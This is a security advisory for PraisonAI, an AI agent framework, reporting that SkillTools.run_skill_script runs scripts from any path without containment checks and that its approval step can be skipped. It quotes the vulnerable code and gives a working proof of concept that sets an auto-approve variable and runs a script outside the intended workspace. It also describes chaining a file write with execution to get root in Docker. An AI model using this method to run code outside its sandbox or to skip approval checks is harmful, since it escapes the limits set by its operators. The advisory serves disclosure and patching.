Vulnerability GHSA-c44f-37qr-gw3f

High Risk
HIGH RISK
CVSS Score: 8.1
Score Range: 7.0–8.9
High severity vulnerabilities (CVSS 7.0–8.9). Serious vulnerabilities that should be prioritized soon after critical fixes.
6 hours ago
October 08, 2026 at 04:49 PM UTC
PraisonAI: SkillTools Executes Scripts Without Path Containment Validation
0.0.1 - 1.6.77
0.0.1 - 1.6.77

Summary

PraisonAI: SkillTools Executes Scripts Without Path Containment Validation

Details

Summary

SkillTools.run_skill_script() accepts a script_path parameter and executes it via subprocess.run() without any path containment validation. While FileTools has _validate_path() with traversal detection, SkillTools performs none. An LLM-directed call can execute arbitrary scripts from any filesystem location. The @require_approval decorator can be bypassed via YAML approve: for high-risk tools.

Details

src/praisonai-agents/praisonaiagents/tools/skill_tools.py (lines 69-119):

def run_skill_script(self, script_path: str, ...):
    script_path = os.path.expanduser(script_path)
    if not os.path.isabs(script_path):
        script_path = os.path.join(self._working_directory, script_path)
    script_path = os.path.abspath(script_path)

    if not os.path.exists(script_path):
        return f"Error: Script not found at {script_path}"

    # No path traversal check, no containment validation
    # Directly executes whatever is at that path:
    result = subprocess.run(cmd, ...)

By contrast, FileTools._validate_path() (src/praisonai-agents/praisonaiagents/tools/file_tools.py, lines 42-78) properly validates that the resolved path stays within the working directory:

def _validate_path(self, filepath: str) -> str:
    # ...
    cwd = os.path.abspath(os.getcwd())
    if os.path.commonpath([absolute, cwd]) != cwd:
        raise ValueError(f"Path traversal detected: {filepath} escapes workspace {cwd}")

SkillTools has no equivalent check.

PoC

import os, tempfile
from praisonaiagents.tools.skill_tools import SkillTools

# Create a "safe" working directory (the jail)
jail = tempfile.mkdtemp(prefix="skill_jail_")

# Create a malicious script OUTSIDE the jail
attack_script = os.path.join(tempfile.gettempdir(), "malicious_skill.sh")
with open(attack_script, 'w') as f:
    f.write("#!/bin/bash\n")
    f.write("echo \"PROOF_OF_EXPLOIT: Script executed outside jail\"\n")
    f.write("echo \"USER: $(whoami)\"\n")
    f.write("echo \"HOSTNAME: $(hostname)\"\n")
os.chmod(attack_script, 0o755)

# Bypass approval (simulates Docker env or YAML approve:)
os.environ["PRAISONAI_AUTO_APPROVE"] = "true"

st = SkillTools()
st._working_directory = jail  # Pretend we're confined

# Run script from OUTSIDE the jail — no path validation!
result = st.run_skill_script(attack_script)
print(result)
# Output:
#   PROOF_OF_EXPLOIT: Script executed outside jail
#   USER: anushkavirgaonkar
#   HOSTNAME: Anushkas-MacBook-Pro-2.local

# Cleanup
del os.environ["PRAISONAI_AUTO_APPROVE"]
os.unlink(attack_script)
os.rmdir(jail)

Tested result: The script at /tmp/malicious_skill.sh executed successfully despite the working directory being set to a jail directory. The output confirms arbitrary script execution including whoami and hostname. No path containment check exists — the absolute path is accepted and executed directly.

Impact

  • Arbitrary script execution: Run any script on the filesystem from any location
  • Chaining with file write: Write a malicious script via write_file (YAML-approvable as a high-risk tool), then execute it via run_skill_script
  • Root-level impact in Docker: All PraisonAI Docker containers run as root (no USER directive), so an escaped script runs with full root privileges

Impacted packages

Timeline

Published
6 hours ago
October 08, 2026 at 04:49 PM UTC
Fixed (1.6.78)
3 months ago
June 25, 2026 at 08:19 AM UTC
Last Modified
6 hours ago
October 08, 2026 at 05:00 PM UTC